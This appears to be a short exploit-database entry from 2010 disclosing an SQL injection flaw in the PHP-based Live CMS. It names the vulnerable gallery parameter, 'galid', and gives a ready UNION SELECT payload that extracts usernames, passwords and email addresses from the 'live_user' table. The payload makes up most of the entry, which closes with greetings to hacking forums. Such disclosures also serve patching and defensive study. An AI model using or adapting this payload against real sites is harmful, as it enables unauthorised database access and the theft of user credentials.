Live CMS - SQL Injection

Author: ahwak2000
type: webapps
platform: php
port: 
date_added: 2010-06-16  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 13911.txt  
/*
[-] Live CMS SQL Injection Vulnerability [-]
---Date : 2010-06-17
---Author : ahwak2000
---Email : z.u5[at]hotmail.com
[-] Script Info [-]
---Home : http://live-space.ru
---Demo : http://demo.live-space.ru/index.php

[-] Vulnerability [-]

http://site.com/path//index.php?area=1&p=gallery&action=showimages&galid=[SQL INj]

[-] eXploit [-]

http://server/path/index.php?area=1&p=gallery&action=showimages&galid=1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),uname,pass,email) from live_user--


[-] Greetz to [-]

To All Friends in V4-team Forums And pc.pirate

*/